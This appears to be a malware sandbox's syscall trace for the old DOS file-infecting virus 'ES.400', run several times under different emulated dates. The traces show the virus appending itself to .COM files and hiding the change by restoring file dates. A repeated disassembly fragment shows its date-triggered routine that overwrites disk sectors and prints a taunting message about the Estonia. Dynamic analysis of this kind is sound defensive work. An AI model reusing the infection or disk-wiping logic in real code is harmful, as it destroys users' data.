Sample viewer

vx.netlux.org/Virus.DOS.ES.400

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:15:13.72293876Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-17T22:15:13.725728831Z 74 PC: 12aa7 | Reallocate memory
2018-12-17T22:15:13.727363898Z 26 PC: 12ab1 | Set disk transfer address
2018-12-17T22:15:13.728720858Z 78 PC: 12abc | Find first file
2018-12-17T22:15:13.736258259Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:15:13.742980698Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.749675675Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.750987865Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.769839452Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.771213546Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.777853941Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.780107303Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.788903094Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.792342587Z 61 PC: 12afc | Open file (Filename = 'PRINT.COM')
2018-12-17T22:15:13.799776285Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.806550575Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.808011851Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.811308245Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.812721154Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.815359516Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.818071387Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.825580862Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.82835583Z 61 PC: 12afc | Open file (Filename = 'HELLO.COM')
2018-12-17T22:15:13.835426212Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.842489972Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.844437864Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.848105563Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.849435234Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.85198731Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.854015933Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.859400484Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.861571274Z 61 PC: 12afc | Open file (Filename = 'PHANG.COM')
2018-12-17T22:15:13.866799661Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.871417326Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.87256585Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.874769082Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.876338434Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.87819212Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.879577521Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.884932442Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.886818814Z 61 PC: 12afc | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:15:13.891078594Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.895848412Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.897028586Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.898999915Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.901654906Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.903700478Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.904939178Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.910228988Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.912121705Z 61 PC: 12afc | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:15:13.916548102Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.921632051Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.922816436Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.934310771Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.938843121Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.946326546Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.948105885Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.957557756Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.961124414Z 61 PC: 12afc | Open file (Filename = 'PAH.COM')
2018-12-17T22:15:13.967622206Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.974965092Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.976334541Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.979023915Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.980670292Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.983492459Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.984864901Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.992067222Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.995047786Z 61 PC: 12afc | Open file (Filename = 'TEST.COM')
2018-12-17T22:15:14.001271038Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:14.004372197Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:14.006254917Z 79 PC: 12abc | Find next file
2018-12-17T22:15:14.008938727Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:30.471484306Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:30.474584151Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:30.476173548Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:30.477289949Z 78 PC: 12abc | Find first file
2018-12-25T11:46:30.484186492Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:30.4923182Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:30.499813272Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:30.501032032Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:30.516611657Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:30.518490651Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:30.527449308Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:30.531262083Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:30.53849149Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.541201632Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.547677782Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.554080758Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.555519407Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.559317145Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.560792322Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.563301298Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.564863129Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.572755823Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.575749234Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.58206396Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.604788513Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.606355766Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.608993789Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.611673514Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.614517441Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.616309411Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.624886333Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.627844499Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.634111364Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.640822988Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.643171939Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.645760695Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.647156913Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.652393261Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.653920298Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.661077808Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.664884545Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.671316933Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.677468503Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.679668376Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.682520813Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.684229659Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.687264125Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.689319774Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.696678738Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.699642038Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.705990724Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.712002735Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.713342781Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.720817642Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.722295321Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.728561824Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.730786911Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.738305891Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.74122813Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.748108666Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.754590854Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.756324748Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.759983425Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.76255276Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.765279411Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.767617073Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.774621915Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.77753089Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.78441084Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.788441571Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.790195706Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.792474247Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:30.808689325Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:30.8124577Z 9 PC: 12a9e | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.274358684Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.277105617Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:32.278410469Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:32.27940283Z 78 PC: 12abc | Find first file
2018-12-25T11:46:32.292166969Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:32.300265126Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:32.306730015Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:32.308516304Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:32.323183807Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:32.324877927Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:32.331524229Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:32.334184021Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:32.341936876Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.344959316Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.351831766Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.359759465Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.361347302Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.364581134Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.366742274Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.369305916Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.370789301Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.379271372Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.382342883Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.389022899Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.396929445Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.398354342Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.40121511Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.403814288Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.407023331Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.408818706Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.417450399Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.420479988Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.427091521Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.434412456Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.435736145Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.438144846Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.439528534Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.442594798Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.443969437Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.451500987Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.454943708Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.461307211Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.467771123Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.470118429Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.472736855Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.474037252Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.477480763Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.478889628Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.486064426Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.489270534Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.496082428Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.502935787Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.505453746Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.513939448Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.51515435Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.522410789Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.524079248Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.531728292Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.534712859Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.542364995Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.548977747Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.550317839Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.553790621Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.555228551Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.557864072Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.560834329Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.565647555Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.567436397Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.572215948Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.573958393Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.575129348Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.577262575Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.295570258Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.299126064Z 9 PC: 12a9e | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.541828071Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.545170935Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:32.548515652Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:32.54981277Z 78 PC: 12abc | Find first file
2018-12-25T11:46:32.557622244Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:32.565843583Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:32.573845667Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:32.575925718Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:32.596783723Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:32.598487299Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:32.605945148Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:32.609146095Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:32.6313124Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.634399604Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.642916593Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.650480151Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.652016018Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.655437647Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.657628546Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.661264158Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.665067757Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.677702411Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.68153241Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.692243508Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.705106726Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.707081908Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.711409972Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.715183951Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.718903333Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.720958544Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.732753685Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.736282997Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.745162948Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.753933792Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.757009375Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.760979534Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.762971454Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.7674383Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.76922721Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.891223647Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.896835072Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.905352922Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.913902587Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.917095457Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.921034269Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.92311425Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.927247679Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.929681206Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.097103256Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.100720449Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.108690913Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.116092038Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.117604781Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.429664488Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.431299301Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.438806662Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.442014551Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.451073747Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.454477023Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.462843414Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.470734965Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.472722101Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.47689832Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.479166881Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.482469949Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.484725139Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.494443221Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.497864183Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.505553966Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.509950962Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.512357383Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.515435824Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.565636658Z 42 PC: 12a76 | Get date
0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.568554971Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:32.569958537Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:32.571015597Z 78 PC: 12abc | Find first file
2018-12-25T11:46:32.580817509Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:32.593982624Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:32.60178846Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:32.603538544Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:32.619672817Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:32.621483509Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:32.62914724Z 87 PC: 12ade | Get or set file date and time
